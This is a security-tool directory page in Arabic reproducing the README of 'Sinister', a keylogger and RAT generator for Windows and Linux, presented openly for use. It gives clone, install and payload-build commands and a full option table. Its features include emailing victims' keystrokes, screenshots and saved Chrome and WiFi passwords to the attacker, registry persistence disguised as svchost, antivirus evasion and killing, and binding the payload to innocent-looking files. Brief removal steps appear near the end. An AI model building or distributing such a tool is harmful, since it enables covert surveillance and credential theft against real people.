Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Sinister — Sinister هو مولد كيلوجر لأنظمة Windows/Linux يقوم بإرسال سجلات الضغط على المفاتيح عبر البريد الإلكتروني مع معلومات مستهدفة أخرى قيمة. | Kitploit
أدوات/GitHubGitHub/pushpenderindia/sinister
كسر كلمات المرورتوليد الحمولةآليات الاستمراريةتسريب البياناتجمع المعلوماتما بعد الاستغلالالفريق الأحمرأداة الوصول عن بعد
GitHubpushpenderindia/sinister

Sinister

Sinister هو مولد كيلوجر لأنظمة Windows/Linux يقوم بإرسال سجلات الضغط على المفاتيح عبر البريد الإلكتروني مع معلومات مستهدفة أخرى قيمة.

عرض المستودع
46593منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شعار Sinister

Sinister

Hacker GIF

root@kitploit:~
                    هذا السكربت البايثون الصغير يمكنه القيام بعمل رائع حقًا.

Sinister هو مُولّد Keylogger لأنظمة ويندوز/لينكس، يقوم بإرسال سجلات المفاتيح ولقطات الشاشة عبر البريد الإلكتروني مع معلومات ضحية أخرى قيّمة، مكتوب بلغة Python 3.

إخلاء مسؤولية

:computer: تم إنشاء هذا المشروع فقط للأغراض الجيدة والاستخدام الشخصي.

هذا البرنامج يُقدم "كما هو" بدون أي ضمان من أي نوع. يمكنك استخدام هذا البرنامج على مسؤوليتك الخاصة. الاستخدام هو مسؤولية المستخدم النهائي بالكامل. المطورون لا يتحملون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

الميزات

  • يعمل على ويندوز/لينكس
  • إشعار بضحية جديدة عبر البريد الإلكتروني
  • غير قابل للكشف
  • الثبات (Persistence)
  • التحقق من صحة بيانات اعتماد البريد الإلكتروني قبل إنشاء الحمولة.
  • يمكن استقبال سجلات المفاتيح في أي مزود بريد إلكتروني مثل GMAIL، YAHOO، OUTLOOK، SMTP مخصص.
  • خادم SMTP / المنفذ
اسم الخادمخادم SMTPمنفذ SMTP
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • إرسال لقطة شاشة لشاشة الكمبيوتر الضحية عبر البريد الإلكتروني
  • إنشاء ملف تنفيذي ثنائي بدون أي تبعيات
  • إنشاء ملف بحجم أقل ~ 5 ميجابايت مع وظائف متقدمة
  • تشويش الحمولة قبل إنشائها، وبالتالي تجاوز عدد قليل من برامج مكافحة الفيروسات
  • الحمولة المُنشأة مُشفّرة بـbase64، مما يجعل الهندسة العكسية للحمولة صعبة للغاية
  • وظيفة لقتل برامج مكافحة الفيروسات على جهاز الضحية ومحاولة تعطيل الأمان
  • واجهة ملونة رائعة لإنشاء الحمولة
  • في جانب المهاجم: أثناء إنشاء الحمولة، يكتشف السكربت تلقائيًا التبعيات المفقودة ويقوم بتثبيتها
  • تمييز بيانات السجل بناءً على اسم النافذة النشطة (انظر الصورة لفهم أفضل)
  • القدرة على إضافة أيقونة مخصصة للملف الخبيث
  • أداة ربط مدمجة يمكنها ربط Keylogger مع أي ملف [.pdf، .txt، .exe إلخ]، تشغيل ملف شرعي في المقدمة والكود الخبيث في الخلفية كخدمة.
  • التحقق من وجود مثيل قيد التشغيل بالفعل على النظام، إذا وُجد مثيل قيد التشغيل، فسيتم تنفيذ الملف الشرعي فقط [مانع تشغيل نسخ متعددة لتجنب استقبال سجلات بريد إلكتروني مكررة].
  • يمكن للمهاجم إنشاء/تجميع لكل من باستخدام نظام لينكس، ولكن يمكن فقط إنشاء/تجميع ملف ويندوز باستخدام جهاز ويندوز
ما يمكن أن يسرقه أداة السرقة المدمجة:
متصفح Chrome (كلمة المرور المحفوظة)
WiFi (كلمة المرور المحفوظة)
ملفات تعريف الارتباط Chrome (بيانات تسجيل الدخول، ملفات تعريف الارتباط، السجل)
ملفات تعريف الارتباط Firefox (cookies.sqlite)

ملاحظة: أداة السرقة المخصصة مبرمجة، ولا تعتمد على LaZagne

  • جلب وإرسال معلومات مفيدة عن جهاز الضحية
هذه الأشياء تُجلب وتُرسل:
نظام التشغيل
اسم الكمبيوتر
اسم المستخدم
IPv4 العام
  • إذا كانت حمولتك غير قادرة على التنفيذ، فاستخدم --debug لتشغيل الـ exe في المقدمة مع CMD

مهم

في 30 مايو 2022، قامت Google بإزالة ميزة التطبيقات الأقل أمانًا، لذا بدلاً من كلمة مرور Gmail:

  • قم بتفعيل المصادقة الثنائية (2FA) على Gmail الخاص بالمهاجم
  • أنشئ كلمة مرور خاصة بالتطبيق
  • استخدم كلمة المرور الخاصة بالتطبيق هذه عند إنشاء الحمولة.
  • كيفية إنشاء كلمة مرور خاصة بالتطبيق: انقر هنا

تم الاختبار على

Kali) Kali Linux - الإصدار المتداول

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

المتطلبات الأساسية

  • Python 3.X
  • عدد قليل من الوحدات الخارجية

كيفية الاستخدام في لينكس

root@kitploit:~
# انتقل إلى الدليل /opt (اختياري)
$ cd /opt/

# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/Sinister.git

# انتقل إلى مجلد Sinister
$ cd Sinister

# تثبيت التبعيات
$ bash installer_linux.sh

*** ملاحظة عند ظهور مربع حوار مثبت Python أثناء تنفيذ installer_linux.sh ***
    * انقر على التثبيت المخصص 
    * حدد المسار إلى: C:/Python37-32
    ### بحيث يتم تثبيت Python في هذا المسار (داخل Wine) : ~/.wine/drive_c/Python37-32

# إذا كنت تواجه أخطاء أثناء تنفيذ installer_linux.sh، حاول التثبيت باستخدام installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# إنشاء الحمولة/RAT
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# إنشاء الحمولة باستخدام خادم SMTP لجيميل، تكوين المنفذ (خادم SMTP الافتراضي = smtp.gmail.com، المنفذ الافتراضي = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# إنشاء الحمولة باستخدام خادم SMTP لأوتلوك، تكوين المنفذ
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# إنشاء الحمولة باستخدام خادم SMTP لياهو، تكوين المنفذ
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا  --icon icon/pdf.ico

كيفية الاستخدام في ويندوز

root@kitploit:~
# تثبيت التبعيات 
$ قم بتثبيت أحدث Python 3.x

# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/Sinister.git

# انتقل إلى المستودع
$ cd Sinister

# تثبيت التبعيات
$ python -m pip install -r requirements.txt

# افتح Sinister.py في محرر نصوص وقم بتكوين السطر 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# الحصول على قائمة المساعدة
$ python Sinister.py --help

# إنشاء الحمولة/RAT
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# إنشاء الحمولة باستخدام خادم SMTP لجيميل، تكوين المنفذ (خادم SMTP الافتراضي = smtp.gmail.com، المنفذ الافتراضي = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# إنشاء الحمولة باستخدام خادم SMTP لأوتلوك، تكوين المنفذ
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# إنشاء الحمولة باستخدام خادم SMTP لياهو، تكوين المنفذ
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا  --icon icon/pdf.ico

كيفية التحديث

  • قم بتشغيل updater.py للتحديث تلقائيًا أو قم بتنزيل أحدث ملف مضغوط من مستودع GitHub هذا
  • ملاحظة: يجب تثبيت Git لاستخدام updater.py

ملاحظة:- سيتم حفظ الملف الخبيث داخل مجلد dist/، داخل مجلد Sinister/

الوسائط المتاحة

  • الوسائط الاختيارية

ملاحظة: يجب تحديد إما -w/--windows أو -l/--linux

  • الوسائط المطلوبة

لقطات شاشة جديدة:

الحصول على المساعدة

إنشاء الحمولة

استلام التقرير

تمييز بيانات السجل بناءً على اسم النافذة النشطة ~ تمت إضافة الميزة في الإصدار 1.3 وما بعده

استرجاع وإرسال كلمات مرور متصفح Chrome المحفوظة

  • ملاحظة: لاستخدام هذه الميزة، حدد -s أو --steal-password عند إنشاء keylogger

استرجاع وإرسال كلمات مرور WiFi المحفوظة

  • ملاحظة: لاستخدام هذه الميزة، حدد -s أو --steal-password عند إنشاء keylogger

راجع أيضًا هذه الصور القديمة

~لقطات شاشة قديمة:

الحصول على المساعدة

تشغيل سكربت Sinister.py

الانتهاء من البناء

عندما يعمل keylogger، فإنه يضيف إدخال ريجستري ليصبح ثابتًا

ينشئ نسخة من نفسه ويحفظها داخل مجلد Roaming

كتابة نص عشوائي لاختبار keylogger

التقرير 1 المرسل من Sinister

تسجيل الدخول إلى فيسبوك ~ الضحية

التقرير 2 - سجلات مفاتيح بيانات اعتماد فيسبوك

التقرير 3 - مع لقطات الشاشة

تصحيح الأخطاء

حاول تشغيل keylogger غير متصل لاختبار التقاط سجلات المفاتيح غير المتصلة وتصحيح مشكلات keylogger عن طريق تشغيل هذه الأوامر:

قم بتشغيل test_key.py في كلا الوضعين [مترجم وخام] واكتشف ماهو الخطأ

قم بتشغيله هكذا: python test_key.py

وقُم أيضًا بتجميعه هكذا: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

بعد تشغيله، ابدأ بكتابة شيء ما. ستظهر النتيجة في موجه الأوامر كل 10 ثوانٍ

ملفات keylogger غير المتصل موجودة في مجلد TestKeylogger

  • إذا كانت الحمولة غير قادرة على التنفيذ على نظام الضحية
root@kitploit:~
1. أنشئ حمولة جديدة مع علامة --debug
2. قم بتشغيل ملف الـ exe للحمولة عبر cmd [لا تقم بتنفيذ الحمولة بالنقر المزدوج عليها]
3. سيعطي الآن خطأ أكثر دقة في CMD، فقط ضع هذه المشكلة في قسم المشكلات

إزالة Sinister في ويندوز:

الطريقة الأولى:

  • اذهب إلى ابدأ، اكتب regedit وقم بتشغيل البرنامج الأول، سيفتح محرر التسجيل.
  • انتقل إلى المسار التالي Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run يجب أن يكون هناك إدخال يسمى svchost، انقر بزر الماوس الأيمن على هذا الإدخال واختر حذف.
  • اذهب إلى مسار المستخدم > AppData > Roaming، سترى ملفًا باسم "svchost.exe"، هذا هو RAT، انقر بزر الماوس الأيمن > حذف.
  • أعد تشغيل النظام.

الطريقة الثانية:

  • قم بتشغيل "RemoveSinister.bat" في النظام المصاب ثم أعد تشغيل الكمبيوتر لإيقاف الملف الخبيث الجاري تشغيله حاليًا.

إزالة Sinister في لينكس:

  • افتح ملف التشغيل التلقائي باستخدام أي محرر نصوص، مسار ملف التشغيل التلقائي: ~/.config/autostart/xinput.desktop

  • قم بإزالة هذه الأسطر الخمسة:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • ملاحظة: destination_file_name هو اسم الملف الخبيث الذي أعطيته لـ keylogger الخاص بك باستخدام الوسيطة -o

  • أعد تشغيل نظامك ثم احذف الملف الخبيث المخزن في هذا المسار أدناه

  • المسار الوجهة، حيث يتم تخزين keylogger: ~/.config/xnput

المساهمون

  • قائمة المساهمين المخصصين: Contributors

المساهمات من أي نوع مرحب بها!

ملاحظة: إذا كان يجب أن تكون في قائمة المساهمين ولكننا نسينا ذكرك، فأخبرنا بذلك!

TODO

  • اقترح ميزتك الخاصة
  • إضافة ميزات جديدة
  • المساهمة في الإصدار الرسومي
تنزيل الأداة
ويندوز/لينكس
  • استرجاع كلمات المرور المحفوظة من نظام الضحية وإرسالها إلى المهاجم.
  • الاختصارالاسم الكاملالوصف
    -h--helpإظهار رسالة المساعدة هذه والخروج
    -i INTERVAL--interval INTERVALالوقت بين التقارير بالثواني. الافتراضي=120
    -t TIME_PERSISTENT--persistence TIME_PERSISTENTجعل الاستمرارية بعد __ ثانية. الافتراضي=10
    -x SMTP_Server--smtpخادم SMTP مخصص. الافتراضي="smtp.gmail.com"
    -y SMTP_Port--portمنفذ SMTP مخصص. الافتراضي=587
    -w--windowsإنشاء ملف ويندوز قابل للتنفيذ.
    -l--linuxإنشاء ملف لينكس قابل للتنفيذ.
    -s--steal-passwordسرقة كلمات المرور المحفوظة من جهاز الضحية [نظام التشغيل المدعوم: ويندوز]
    -b file.txt--bind LEGITIMATE_FILE_PATH.pdfأداة الربط التلقائي: حدد مسار الملف الشرعي. [نظام التشغيل المدعوم: ويندوز]
    -d--debugسيتم تشغيل الحمولة في المقدمة مع نافذة CMD، للحصول على خطأ التنفيذ المناسب
    الاختصارالاسم الكاملالوصف
    --icon ICONحدد مسار الأيقونة، أيقونة الملف الخبيث [ملاحظة: يجب أن تكون .ico]
    -e EMAIL--email EMAILعنوان البريد الإلكتروني لإرسال التقارير إليه.
    -p PASSWORD--password PASSWORDكلمة المرور لعنوان البريد الإلكتروني المحدد في الوسيطة -e.
    -o OUT--out OUTاسم ملف الإخراج.

    Pushpender Singh

    :computer:

    Thomas Kunwar

    :computer:

    krasnova19

    :computer:

    sarchish5

    :computer:

    chiragcode11

    :computer:

    C4RR0T02

    :computer: